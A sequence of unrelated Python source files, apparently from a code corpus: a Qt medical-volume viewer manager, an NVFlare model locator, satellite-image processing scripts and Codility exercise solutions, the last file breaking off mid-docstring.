view.layers[Layers.vectors].set_subsampling(value)
else:
self.controller.current_view.layers[Layers.vectors].set_subsampling(value)
def vector_scale_changed(self, value):
if self.link_views:
for view in self.views.values():
view.layers[Layers.vectors].set_scale(value)
else:
self.controller.current_view.layers[Layers.vectors].set_scale(value)
def vector_change_color(self):
col = QtGui.QColorDialog.getColor()
if col.isValid():
self.modify_layer(Layers.vectors, 'set_arrow_color', col)
def showRedViewManagerSlot(self):
self.switch_selected_view(0)
def showBlueViewManagerSlot(self):
self.switch_selected_view(1)
def showGreenViewManagerSlot(self):
self.switch_selected_view(2)
def showOrangeViewManagerSlot(self):
self.switch_selected_view(3)
def showYellowViewManagerSlot(self):
self.switch_selected_view(4)
def showCyanViewManagerSlot(self):
self.switch_selected_view(5)
def on_fdr_button_clicked(self, t):
"""
Upon clicking the fdr threshold button the signal with the corresponding t value arives here
Set the threshold on the current Heatmap volume
Parameters
----------
t: float
the t-statistic
"""
self.modify_layer(Layers.heatmap, 'set_t_threshold', t)
def volume_changed(self, vol_name):
"""
When volume is changed from the combobox
"""
self.modify_layer(Layers.vol1, 'set_volume', vol_name)
def volume2_changed(self, vol_name):
"""
When volume is changed from the combobox
"""
self.modify_layer(Layers.vol2, 'set_volume', vol_name)
def data_changed(self, vol_name):
"""
"""
self.modify_layer(Layers.heatmap, 'set_volume', vol_name)
self.update_connected_components(vol_name)
def update_connected_components(self, vol_name):
self.blob_table.clear()
self.blob_table.setRowCount(0) # clear
self.blob_table.setHorizontalHeaderLabels(['Count', 'Mean', 'location x:x, y:y, z:z'])
# set the connected component list
if vol_name != 'None':
conn = self.model.getdata(vol_name).connected_components
for i, (size_mean, bbox) in enumerate(conn.items()):
self.blob_table.insertRow(i)
bbox_string = ', '.join(str(x) for x in bbox)
self.blob_table.setItem(i, 0, QtGui.QTableWidgetItem(str(size_mean[0])))
self.blob_table.setItem(i, 1, QtGui.QTableWidgetItem(str(size_mean[1])))
self.blob_table.setItem(i, 2, QtGui.QTableWidgetItem(bbox_string))
self.blob_table.resizeColumnsToContents()
def on_connected_table_clicked(self, row, _):
roi_widget = self.blob_table.item(row, 2)
roi_str = roi_widget.text()
roi = [x.strip() for x in roi_str.split(', ')]
self.roi_signal.emit(roi[0:2], roi[2:4], roi[4:6])
def vector_changed(self, vol_name):
self.modify_layer(Layers.vectors, 'set_volume', vol_name)
def switch_selected_view(self, slice_id):
"""
update the slice manager with data from a slice view
:param slice_id: Id of the SliceWidget that this current widget was activated from
"""
self.ui.pushButtonManagerRed.setStyleSheet("background-color: #FFDEDE")
self.ui.pushButtonManagerBlue.setStyleSheet("background-color: #D2C9FF")
self.ui.pushButtonManagerGreen.setStyleSheet("background-color: #C9FFCB")
self.ui.pushButtonManagerOrange.setStyleSheet("background-color: #FFF3A6")
self.ui.pushButtonManagerGrey.setStyleSheet("background-color: #FFFFFF")
self.ui.pushButtonManagerCyan.setStyleSheet("background-color: #ABFFFE")
if slice_id == 0:
self.ui.pushButtonManagerRed.setStyleSheet("background-color: red")
elif slice_id == 1:
self.ui.pushButtonManagerBlue.setStyleSheet("background-color: blue")
elif slice_id == 2:
self.ui.pushButtonManagerGreen.setStyleSheet("background-color: green")
elif slice_id == 3:
self.ui.pushButtonManagerOrange.setStyleSheet("background-color: orange")
elif slice_id == 4:
self.ui.pushButtonManagerGrey.setStyleSheet("background-color: grey")
elif slice_id == 5:
self.ui.pushButtonManagerCyan.setStyleSheet("background-color: cyan")
self.controller.set_current_view(slice_id)
self.update()
self.show()
def update(self):
"""
Update the view manager for the current Slice view.
Called when viewing a new orthogonal view
"""
self.populate_volume_controls()
self.populate_heatmap_controls()
self.populate_vector_controls()
def refresh_data_comboboxes(self):
"""
"""
self.populate_volume_controls()
self.populate_heatmap_controls()
self.annotations.update()
def populate_heatmap_controls(self):
self.ui.comboBoxData.clear()
self.ui.comboBoxData.addItems(self.model.data_id_list())
self.ui.comboBoxData.addItem("None")
self.ui.comboBoxOrientation.setCurrentIndex(self.ui.comboBoxOrientation.findText(
self.controller.current_orientation().name))
self.ui.comboBoxLutHeatmap.clear()
self.ui.comboBoxLutHeatmap.addItems(self.luts.heatmap_lut_list())
# self.update_connected_components() TODO: how signal update
self.update_data_controls()
def clear_layout(self, layout):
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self.clear_layout(item.layout())
def update_fdr_buttons(self):
"""
When the heatmap volume has been changed, check for the presence of q->t threshold mapping dict and set buttons if present
"""
slice_layers = self.controller.current_view.layers
heatmap_vol = slice_layers[Layers.heatmap].vol
if not heatmap_vol:
return
row = 0
col = 0
self.clear_layout(self.ui.gridLayoutFdrButtons)
if heatmap_vol.fdr_thresholds:
self.ui.labelFdrThresholds.show()
group = QtGui.QButtonGroup(self)
for q, t in heatmap_vol.fdr_thresholds.items():
try:
float(t)
except (ValueError, TypeError):
continue
button = QtGui.QPushButton(str(q))
group.addButton(button)
button.clicked.connect(partial(self.on_fdr_button_clicked, t))
self.ui.gridLayoutFdrButtons.addWidget(button, row, col)
col += 1
if col > 5:
row += 1
col = 0
else:
self.ui.labelFdrThresholds.hide()
def populate_volume_controls(self):
"""
when a new view manager is activatewd from a new slice view
:return:
"""
self.ui.comboBoxVolume.clear()
self.ui.comboBoxVolume.addItems(self.model.volume_id_list())
self.ui.comboBoxVolume.addItem("None")
# do the luts
self.ui.comboBoxVolumeLut.clear()
# Lookup table combobox
self.ui.comboBoxVolumeLut.addItems(self.luts.lut_list())
self.ui.comboBoxVolume2.clear()
self.ui.comboBoxVolume2.addItems(self.model.volume_id_list())
self.ui.comboBoxVolume2.addItem("None")
# do the luts
self.ui.comboBoxVolumeLut2.clear()
# Lookup table combobox
self.ui.comboBoxVolumeLut2.addItems(self.luts.lut_list())
self.update_volume_controls()
def populate_vector_controls(self):
self.ui.comboBoxVectors.clear()
self.ui.comboBoxVectors.addItems(self.model.vector_id_list())
self.ui.comboBoxVectors.addItem("None")
self.update_vector_controls()
def update_vector_controls(self):
vol = self.controller.current_view.layers[Layers.vectors].vol
if vol:
self.ui.spinBoxVectorSubsampling.setValue(vol.subsampling)
self.ui.spinBoxVectorScale.setValue(vol.scale)
self.ui.comboBoxVectors.setCurrentIndex(self.ui.comboBoxVectors.findText(vol.name))
else:
self.ui.comboBoxVectors.setCurrentIndex( self.ui.comboBoxVectors.findText('None'))
def update_volume_controls(self):
slice_layers = self.controller.current_view.layers
vol1 = slice_layers[Layers.vol1].vol
if vol1:
min_, max_ = [round(x, 2) for x in vol1.intensity_range()]
lower, upper = [round(x, 2) for x in vol1.levels]
self.volume_levels_slider.setMin(min_)
self.volume_levels_slider.setMax(max_)
self.volume_levels_slider.setStart(lower)
self.volume_levels_slider.setEnd(upper)
self.volume_levels_slider.update()
self.ui.comboBoxVolume.setCurrentIndex(
self.ui.comboBoxVolume.findText(vol1.name))
self.ui.comboBoxVolumeLut.setCurrentIndex(
self.ui.comboBoxVolumeLut.findText(slice_layers[Layers.vol1].lut[1]))
else: # No volume
self.ui.comboBoxVolume.setCurrentIndex(self.ui.comboBoxVolume.findText('None'))
vol2 = slice_layers[Layers.vol2].vol
if vol2:
min_, max_ = [round(x, 2) for x in vol2.intensity_range()]
lower, upper = [round(x, 2) for x in vol2.levels]
self.volume_levels_slider2.setMin(min_)
self.volume_levels_slider2.setMax(max_)
self.volume_levels_slider2.setStart(lower)
self.volume_levels_slider2.setEnd(upper)
self.volume_levels_slider2.update()
self.ui.comboBoxVolume2.setCurrentIndex(self.ui.comboBoxVolume2.findText(vol2.name))
self.ui.comboBoxVolumeLut2.setCurrentIndex(
self.ui.comboBoxVolumeLut2.findText(slice_layers[Layers.vol2].lut[1]))
else: # No second volume overlay
self.ui.comboBoxVolume2.setCurrentIndex(self.ui.comboBoxVolume2.findText('None'))
def update_color_scale_bar(self):
vol = self.controller.current_view.layers[Layers.heatmap].vol
if vol:
neg_lower, neg_upper = [round(x, 2) for x in vol.neg_levels]
pos_lower, pos_upper = [round(x, 2) for x in vol.pos_levels]
self.colour_bar.update(pos_upper, pos_lower, neg_upper,neg_lower)
def update_data_controls(self):
vol = self.controller.current_view.layers[Layers.heatmap].vol
self.update_fdr_buttons()
if vol:
min_, max_ = [round(x, 2) for x in vol.intensity_range()]
neg_min_nonzero, pos_min_nonzero = vol.non_zero_mins
neg_lower, neg_upper = [round(x, 2) for x in vol.neg_levels]
pos_lower, pos_upper = [round(x, 2) for x in vol.pos_levels]
# print min_, max_, neg_lower, pos_lower, pos_upper
# if there are no values for negative or positive stats, we need to inactivate the respective sliders
# as we can't have sliders with min=0 and max = 0
self.ui.comboBoxData.setCurrentIndex(self.ui.comboBoxData.findText(vol.name))
try:
if pos_upper > 0.0:
self.data_levels_positive_slider.setEnabled(True)
self.data_levels_positive_slider.setMin(pos_min_nonzero)
self.data_levels_positive_slider.setMax(max_)
self.data_levels_positive_slider.setStart(pos_lower)
self.data_levels_positive_slider.setEnd(pos_upper)
self.data_levels_positive_slider.update()
pos_bg = 'background: qlineargradient(x1: 0, x2: 1,stop: 0 #222222, stop: 0.5 #FF0000, stop: 1.0 #FFFFFF );'
self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
else: # no positive values, set to grey
self.data_levels_positive_slider.setEnabled(False)
pos_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #ADADAD, stop: 1 #ADADAD);'
self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
if neg_lower < 0.0:
self.data_levels_negative_slider.setEnabled(True)
self.data_levels_negative_slider.setMin(min_)
self.data_levels_negative_slider.setMax(neg_min_nonzero)
self.data_levels_negative_slider.setStart(neg_lower)
self.data_levels_negative_slider.setEnd(neg_upper)
self.data_levels_negative_slider.update()
neg_bg = 'background: qlineargradient(x1: 0, x2: 1,stop: 0 #FFFFFF, stop: 0.5 #0000FF, stop: 1 #222222);'
self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
else: # no negative values, set to grey
self.data_levels_negative_slider.setEnabled(False)
neg_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #ADADAD, stop: 1 #ADADAD);'
self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
except TypeError:
# The slider is raising a type error. Not sure why at the moment
print('Slider error')
self.update_color_scale_bar()
self.ui.doubleSpinBoxNegThresh.setValue(neg_upper)
self.ui.doubleSpinBoxPosThresh.setValue(pos_lower)
else:
self.ui.comboBoxData.setCurrentIndex(self.ui.comboBoxData.findText('None'))
def modify_layer(self, layer_idx: Layers, method: str, *args):
"""
Instead of of replicating all the functions in the layers here, we get the method to call on the layers by
str and getattr
Parameters
----------
layer_idx
The enum specifying whch layer to target
method
The method in the Layer subclasses to call
args
Any arguments to pass on
"""
if self.link_views:
for view in self.views.values():
getattr(view.layers[layer_idx], method)(*args)
else:
getattr(self.controller.current_view.layers[layer_idx], method)(*args)
self.update_slice_views()
self.update_volume_controls()
self.update_data_controls()
self.update_vector_controls()
def lower_level_volume_changed(self, value):
self.controller.current_view.layers[Layers.vol1].vol.set_lower_level(value)
self.update_slice_views()
def upper_level_volume_changed(self, value):
self.controller.current_view.layers[Layers.vol1].vol.set_upper_level(value)
self.update_slice_views()
def lower_level_volume2_changed(self, value):
self.controller.current_view.layers[Layers.vol2].vol.set_lower_level(value)
self.update_slice_views()
def upper_level_volume2_changed(self, value):
if self.controller.current_view.layers[Layers.vol2].vol:
self.controller.current_view.layers[Layers.vol2].vol.set_upper_level(value)
self.update_slice_views()
def update_data_lut(self, which, value):
vol = self.controller.current_view.layers[Layers.heatmap].vol
if vol:
if which == 'neg_lower':
vol.set_lower_negative_lut(value)
elif which == 'neg_upper':
vol.set_upper_negative_lut(value)
elif which == 'pos_lower':
vol.set_lower_positive_lut(value)
elif which == 'pos_upper':
vol.set_upper_positive_lut(value)
self.update_slice_views()
def data_negative_lower_changed(self, value):
self.update_data_lut('neg_lower', value)
def data_negative_higher_changed(self, value):
self.update_data_lut('neg_upper', value)
self.ui.doubleSpinBoxNegThresh.setValue(value)
def data_positive_lower_changed(self, value):
self.update_data_lut('pos_lower', value)
self.ui.doubleSpinBoxPosThresh.setValue(value)
def data_positive_higher_changed(self, value):
self.update_data_lut('pos_upper', value)
# def modify_tstat_lut(self, index, value):
# self.update_slice_views()
def on_vol_lut_changed(self, lut_name):
self.modify_layer(Layers.vol1, 'set_lut', lut_name)
def on_vol2_lut_changed(self, lut_name):
self.modify_layer(Layers.vol2, 'set_lut', lut_name)
def on_heatmap_lut_changed(self, lut_name):
"""
The heatmap LUT is stored on the volume not on the layer
Parameters
----------
lut_name str:
the name of the LUT
"""
vol = self.controller.current_view.layers[Layers.heatmap].vol
vol.set_lut(lut_name)
self.update_slice_views()
def update_slice_views(self):
self.update_color_scale_bar()
for view in self.views.values():
view.update_view()
def clear(self):
self.blob_table.clear()
def set_current_sliceview(self, slice_id):
self.current_slice_view = self.model.slice_views[slice_id]
def on_link_views(self, checked):
self.link_views = checked
@property
def link_views(self):
return self._link_views
@link_views.setter
def link_views(self, checked):
self._link_views = checked
self.ui.checkBoxLinkViews.setChecked(checked)
def left_view_visibility(self, checked):
if checked:
self.views[0].show()
if self.six_views_visible:
self.views[3].show()
else:
self.views[0].hide()
if self.six_views_visible:
self.views[3].hide()
def central_view_visibility(self, checked):
if checked:
self.views[1].show()
if self.six_views_visible:
self.views[4].show()
else:
self.views[1].hide()
if self.six_views_visible:
self.views[4].hide()
def right_view_visibility(self, checked):
if checked:
self.views[2].show()
if self.six_views_visible:
self.views[5].show()
else:
self.views[2].hide()
if self.six_views_visible:
self.views[5].hide()
def show2Rows(self, checked):
if checked:
self.six_views_visible = True
self.views[3].show()
self.views[4].show()
self.views[5].show()
self.ui.pushButtonManagerOrange.show()
self.ui.pushButtonManagerGrey.show()
self.ui.pushButtonManagerCyan.show()
else:
self.six_views_visible = False
self.views[3].hide()
self.views[4].hide()
self.views[5].hide()
self.ui.pushButtonManagerOrange.hide()
self.ui.pushButtonManagerGrey.hide()
self.ui.pushButtonManagerCyan.hide()
self.controller.update_slice_views()
def on_interpolate(self, checked):
self.model.set_interpolation(checked)
self.update_slice_views()
def on_orientation(self, orientation: str):
"""
Activated when the orientation combobox is changed
:return:
"""
# convert the str to an enum member
orientation = Orientation[orientation]
if self.link_views:
for v in self.views.values():
v.set_orientation(orientation)
else:
v = self.controller.current_view
v.set_orientation(orientation)
class ColorScaleBar(object):
def __init__(self, layout, neg_lut, pos_lut):
self.color_scale_widget = pg.GraphicsLayoutWidget()
self.color_scale_widget.setMaximumSize(150, 300)
self.color_scale_widget.setMinimumSize(150, 300)
self.color_scale_widget.hide()
self.layout = layout
self.layout.addWidget(self.color_scale_widget)
self.color_scale_view = self.color_scale_widget.addViewBox(row=0, col=0, enableMouse=False, lockAspect=True)
self.font = QtGui.QFont('Arial', 13, QtGui.QFont.Bold)
self.neg_lut = neg_lut
self.pos_lut = pos_lut
self.pushButtonInvertColor = QtGui.QPushButton('Invert color')
self.pushButtonInvertColor.clicked.connect(self.on_invert)
self.layout.addWidget(self.pushButtonInvertColor)
self.pushButtonInvertColor.hide()
self.neg_text_coords = [10, 13]
self.pos_text_coords = [10, 210]
self.tstat_label_coords = [-5, 140]
def update(self, max_pos, min_neg, min_pos, max_neg):
if self.color_scale_view:
self.color_scale_widget.removeItem(self.color_scale_view)
self.color_scale_view = self.color_scale_widget.addViewBox(row=0, col=0, enableMouse=False, lockAspect=True)
self.min_pos_text = pg.TextItem(str(round(min_pos, 2)))
self.min_neg_text = pg.TextItem(str(round(min_neg, 2)))
self.max_pos_text = pg.TextItem(str(round(max_pos, 2)))
self.max_neg_text = pg.TextItem(str(round(max_neg, 2)))
rgba_pos = []
for x in range(0, self.pos_lut.shape[1]):
col = self.pos_lut[:, x]
slice_ = np.array([col])
rgba_pos.append(slice_.T)
rgba_neg = []
for x in range(0, self.neg_lut.shape[1]):
col = self.neg_lut[:, x]
slice_ = np.array([col])
rgba_neg.append(slice_.T)
pos_img = np.dstack(tuple(rgba_pos)).astype(np.uint8)
neg_img = np.dstack(tuple(rgba_neg)).astype(np.uint8)
full_img = np.rot90(np.vstack((neg_img, pos_img)))
remove_padding = 0
# remove the black section of the colormap from the negative scale
remove_start = int(full_img.shape[1] / 2 - remove_padding)
remove_end = int(full_img.shape[1] / 2 + remove_padding)
remove_range = range(remove_start, remove_end)
full_img = np.delete(full_img, remove_range, axis=1)
ii = pg.ImageItem(full_img)
ii.setRect(QtCore.QRect(0, 0, 10, 200))
self.color_scale_view.addItem(self.max_pos_text)
self.color_scale_view.addItem(self.min_neg_text)
self.color_scale_view.addItem(self.min_pos_text)
self.color_scale_view.addItem(self.max_neg_text)
self.max_pos_text.setFont(self.font)
self.min_neg_text.setFont(self.font)
self.min_pos_text.setFont(self.font)
self.max_neg_text.setFont(self.font)
self.max_neg_text.setPos(*self.neg_text_coords)
self.max_pos_text.setPos(*self.pos_text_coords)
#min_neg_text.setPos(10, 60)
self.color_scale_view.addItem(ii)
# Find how far up the color map the minimum positive is
min_pos_y = (full_img.shape[1] / 2) + 20
min_pos_y_mapped = self.color_scale_view.mapFromItemToView(ii, QtCore.QPointF(40, min_pos_y))
self.min_pos_text.setPos(9, min_pos_y_mapped.y())
min_neg_y = full_img.shape[1] / 2 + 80
min_neg_y_mapped = self.color_scale_view.mapFromItemToView(ii, QtCore.QPointF(40, min_neg_y))
self.min_neg_text.setPos(13, min_neg_y_mapped.y())
self.label = pg.TextItem('t-statistics', angle=-90)
self.label.setFont(self.font)
self.color = 'white'
#self.label.setText('t-statistics', self.color)
self.color_scale_view.addItem(self.label)
self.label.setPos(*self.tstat_label_coords)
self.inverted = False
def redraw(self):
pass
def on_invert(self):
if self.inverted:
self.inverted = False
self.label.textItem.setDefaultTextColor(QtGui.QColor(0, 0, 0))
self.max_pos_text.textItem.setDefaultTextColor(QtGui.QColor(0, 0, 0))
self.min_pos_text.textItem.setDefaultTextColor(QtGui.QColor(0, 0, 0))
self.max_neg_text.textItem.setDefaultTextColor(QtGui.QColor(0, 0, 0))
self.min_neg_text.textItem.setDefaultTextColor(QtGui.QColor(0, 0, 0))
self.color_scale_widget.setBackground(QtGui.QColor(255, 255, 255))
else:
self.inverted = True
self.label.textItem.setDefaultTextColor(QtGui.QColor(255, 255, 255))
self.max_pos_text.textItem.setDefaultTextColor(QtGui.QColor(255, 255, 255))
self.min_pos_text.textItem.setDefaultTextColor(QtGui.QColor(255, 255, 255))
self.max_neg_text.textItem.setDefaultTextColor(QtGui.QColor(255, 255, 255))
self.min_neg_text.textItem.setDefaultTextColor(QtGui.QColor(255, 255, 255))
self.color_scale_widget.setBackground(QtGui.QColor(0, 0, 0))
def hide(self):
self.pushButtonInvertColor.hide()
self.color_scale_widget.hide()
self.pushButtonInvertColor.hide()
def show(self):
self.pushButtonInvertColor.show()
self.color_scale_widget.show()
self.pushButtonInvertColor.show()
def set_minimum_value(self, value):
pass
def set_maximum_value(self, value):
pass | StarcoderdataPython |
3329178 | # Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import torch
from nvflare.apis.dxo import DXO, DataKind
from nvflare.apis.fl_constant import FLContextKey
from nvflare.apis.fl_context import FLContext
from nvflare.app_common.abstract.model_locator import ModelLocator
from nvflare.app_common.pt.pt_fed_utils import PTModelPersistenceFormatManager
from nvflare.app_common.app_constant import DefaultCheckpointFileName
class PTModelLocator(ModelLocator):
SERVER_MODEL_NAME = "server"
SERVER_BEST_MODEL_NAME = "server_best"
def __init__(
self, model_dir="app_server",
model_name=DefaultCheckpointFileName.GLOBAL_MODEL,
best_model_name=DefaultCheckpointFileName.BEST_GLOBAL_MODEL
):
"""A ModelLocator that provides the global and best global models.
Args:
model_dir: directory where global models are saved.
model_name: name of the saved global model.
best_model_name: name of the saved best global model.
Returns:
a DXO depending on the specified `model_name` in `locate_model()`.
"""
super().__init__()
self.model_dir = model_dir
self.model_file_name = model_name
self.best_model_file_name = best_model_name
def get_model_names(self, fl_ctx: FLContext) -> List[str]:
"""Returns the list of model names that should be included from server in cross site validation.add()
Args:
fl_ctx (FLContext): FL Context object.
Returns:
List[str]: List of model names.
"""
return [PTModelLocator.SERVER_MODEL_NAME, PTModelLocator.SERVER_BEST_MODEL_NAME]
def locate_model(self, model_name, fl_ctx: FLContext) -> DXO:
dxo = None
engine = fl_ctx.get_engine()
if model_name in (PTModelLocator.SERVER_MODEL_NAME, PTModelLocator.SERVER_BEST_MODEL_NAME):
run_number = fl_ctx.get_prop(FLContextKey.CURRENT_RUN)
run_dir = engine.get_workspace().get_run_dir(run_number)
model_path = os.path.join(run_dir, self.model_dir)
if model_name == PTModelLocator.SERVER_BEST_MODEL_NAME:
model_load_path = os.path.join(model_path, self.best_model_file_name)
else:
model_load_path = os.path.join(model_path, self.model_file_name)
model_data = None
try:
model_data = torch.load(model_load_path)
self.log_info(fl_ctx, f"Loaded {model_name} model from {model_load_path}.")
except Exception as e:
self.log_error(fl_ctx, f"Unable to load model: {e}.")
if model_data is not None:
mgr = PTModelPersistenceFormatManager(model_data)
dxo = DXO(data_kind=DataKind.WEIGHTS, data=mgr.var_dict, meta=mgr.meta)
return dxo
| StarcoderdataPython |
23344 | <gh_stars>0
#!/usr/bin/env python
u"""
read_iceye_h5.py
Written by <NAME>' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
--slc SLC, -C SLC Process and single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
def main():
parser = argparse.ArgumentParser(
description="""TEST: Read ICEye Single Look Complex and Parameter."""
)
# - Absolute Path to directory containing input data.
default_dir = os.path.join(os.path.expanduser('~'), 'Desktop',
'iceye_gamma_test')
parser.add_argument('--directory', '-D',
type=lambda p: os.path.abspath(os.path.expanduser(p)),
default=default_dir,
help='Project data directory.')
parser.add_argument('--slc', '-C', type=str,
default=None, help='Process and single SLC.')
args = parser.parse_args()
# - Path to Test directory
data_dir = os.path.join(args.directory, 'input')
# - create output directory
out_dir = make_dir(args.directory, 'output')
out_dir = make_dir(out_dir, 'slc+par')
# - ICEye Suffix
ieye_suff = 'ICEYE_X7_SLC_SM_'
if args.slc is not None:
# - Process a single SLC
b_input = os.path.join(data_dir, args.slc)
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.slc')))
par_name = os.path.join(out_dir,
str(b_input_name.replace('.h5', '.par')))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
else:
# - Process hte entire input directory content
# - List Directory Content
data_dir_list = [os.path.join(data_dir, x) for x in os.listdir(data_dir)
if x.endswith('.h5')]
for b_input in tqdm(data_dir_list, total=len(data_dir_list), ncols=60):
# - Read input Binary File Name
b_input_name = b_input.split('/')[-1].replace(ieye_suff, '')
slc_name = os.path.join(out_dir, b_input_name.replace('.h5', '.slc'))
par_name = os.path.join(out_dir, b_input_name.replace('.h5', '.par'))
# - Extract SLC and Parameter File
# - Set dtype equal to zero to save the SLC in FCOMPLEX format.
pg.par_ICEYE_SLC(b_input, par_name, slc_name, 0)
# - run main program
if __name__ == '__main__':
start_time = datetime.datetime.now()
main()
end_time = datetime.datetime.now()
print(f"# - Computation Time: {end_time - start_time}")
| StarcoderdataPython |
1738031 | # https://app.codility.com/programmers/lessons/3-time_complexity/
# FrogJmp
#solution 1
import math # use of math
def solution(X, Y, D):
if( X == Y):
return 0
return math.ceil( (Y - X) / D)
#solution 2
def solution(X, Y, D):
location = X
counter = 0
while( location < Y):
location += D
counter += 1
return counter
# PermMissingElem
def solution(A):
array_sum = sum(A)
total_sum = ((1 + len(A)+1) * (len(A)+1) )// 2
return total_sum - array_sum
# TapeEquilibrium
def solution(A):
total = sum(A)
min_diff = float('inf')
current_r_sum = 0
for v in A[:-1]:
current_r_sum += v
min_diff = min(abs((total - current_r_sum) - current_r_sum), min_diff)
if min_diff == 0:
return 0
return min_diff
| StarcoderdataPython |
101848 | import os
import numpy as np
from PIL import Image
from eratosthenes.generic.mapping_io import read_geo_image
from eratosthenes.preprocessing.shadow_transforms import mat_to_gray, gamma_adjustment, log_adjustment
rgi_id = 'RGI60-01.19773' # Red Glacier
bbox = (4353, 5279, 9427, 10980) # 1000 m buffer
f2018 = "T05VMG_20180913T214531_B0"
f2020 = "T05VMG_20200912T214531_B0"
# read data
I_18_b,_,_,_ = read_geo_image(os.path.join('header', f2018+'2.jp2'))
I_18_g,_,_,_ = read_geo_image(os.path.join('header', f2018+'3.jp2'))
I_18_r,_,_,_ = read_geo_image(os.path.join('header', f2018+'4.jp2'))
I_20_b,_,_,_ = read_geo_image(os.path.join('header', f2020+'2.jp2'))
I_20_g,_,_,_ = read_geo_image(os.path.join('header', f2020+'3.jp2'))
I_20_r,_,_,_ = read_geo_image(os.path.join('header', f2020+'4.jp2'))
# make sub-set
I_18_r = I_18_r[bbox[0]:bbox[1],bbox[2]:bbox[3]]
I_18_g = I_18_g[bbox[0]:bbox[1],bbox[2]:bbox[3]]
I_18_b = I_18_b[bbox[0]:bbox[1],bbox[2]:bbox[3]]
I_20_r = I_20_r[bbox[0]:bbox[1],bbox[2]:bbox[3]]
I_20_g = I_20_g[bbox[0]:bbox[1],bbox[2]:bbox[3]]
I_20_b = I_20_b[bbox[0]:bbox[1],bbox[2]:bbox[3]]
#
I_18_r = mat_to_gray(I_18_r)
I_18_g = mat_to_gray(I_18_g)
I_18_b = mat_to_gray(I_18_b)
I_20_r = mat_to_gray(I_20_r)
I_20_g = mat_to_gray(I_20_g)
I_20_b = mat_to_gray(I_20_b)
I_18_rgb = np.dstack((I_18_r, I_18_g, I_18_b))
I_18_rgb = np.uint8(255*I_18_rgb)
I_18_rgb_l = log_adjustment(I_18_rgb)
img = Image.fromarray(I_18_rgb_l)
img.save("Red-sen2-13-09-2018.jpg", quality=95)
I_20_rgb = np.dstack((I_20_r, I_20_g, I_20_b))
I_20_rgb = np.uint8(255*I_20_rgb)
I_20_rgb_l = log_adjustment(I_20_rgb)
img = Image.fromarray(I_20_rgb_l)
img.save("Red-sen2-12-09-2020.jpg", quality=95)
| StarcoderdataPython |
117180 | """
<NAME>
descriptor.py
Takes in a directory of sub-directories of images and produces a descriptor
file for all the images found in the sub-directories.
,:'/ _..._
// ( `""-.._.'
\| / 6\___
| 6 4
| /
\_ .--'
(_'---'`)
/ `'---`()
,' |
, .'` |
)\ _.-' ;
/ | .'` _ /
/` / .' '. , |
/ / / \ ; | |
| \ | | .| | |
\ `"| /.-' | | |
'-..-\ _.;.._ | |.;-.
\ <`.._ )) | .;-. ))
(__. ` ))-' \_ ))'
`'--"` `""`
I'll describe each image for you...okay that first one is gray...the
second one is also gray...the next one's gray...
"""
import os
import sys
import pickle
import cv2 as cv
import numpy as np
def read_train_dir(train_dir):
"""
Take in a directory of sub-directories of images
Go through each sub-directory that matches one of the backgrounds
(grass, ocean, readcarpet, road, wheatfield)
Get all the images in each sub-directory and put it into a list
Append that list of all images in sub-directory to train_dir_imgs list
Return train_dir_imgs list which will contain all the images in all the
sub-directories sorted by background classification
"""
train_dir_imgs = list()
img_dirs = ["grass", "ocean", "redcarpet", "road", "wheatfield"]
for fil in os.listdir(train_dir):
if fil in img_dirs:
images = find_images(train_dir + "/" + fil)
train_dir_imgs.append(images)
return train_dir_imgs
def find_images(dir):
"""
Take in directory of images, open directory, read in each image,
add to list of images, return list of images
"""
images = list()
for fil in os.listdir(dir):
if fil.lower().endswith('.jpeg'):
try:
img = cv.imread(dir + "/" + fil, 1)
except cv.error:
print("{} malformed!".format(fil))
sys.exit()
images.append(img)
return images
def get_3D_hist(sub_img):
"""
Take in a sub-image
Get 3D histogram of the colors of the image and return it
"""
M, N = sub_img.shape[:2]
t = 4
pixels = sub_img.reshape(M * N, 3)
hist_3D, _ = np.histogramdd(pixels, (t, t, t))
return hist_3D
def get_sub_imgs(img):
"""
Take in an image
Using b_w and b_h = 4, get all sub-images within the image
(i.e. 25 blocks of equal size, evenly spaced from top left corner)
Return the list of sub-images
"""
H, W = img.shape[:2]
b_w = b_h = 4
del_w = W // (b_w + 1)
del_h = H // (b_h + 1)
sub_imgs = np.empty((5,5,del_h,del_w,3))
for i in range(b_w+1):
for j in range(b_h+1):
w1 = i*del_w
w2 = w1 + del_w
h1 = j*del_h
h2 = h1 + del_h
sub_img = img[h1:h2, w1:w2]
sub_imgs[i,j] = sub_img
return sub_imgs
def get_desc_vec(sub_imgs):
"""
Take in a list of sub-images
For each sub-image:
- Stack it with the sub-image next to it, the sub-image below it,
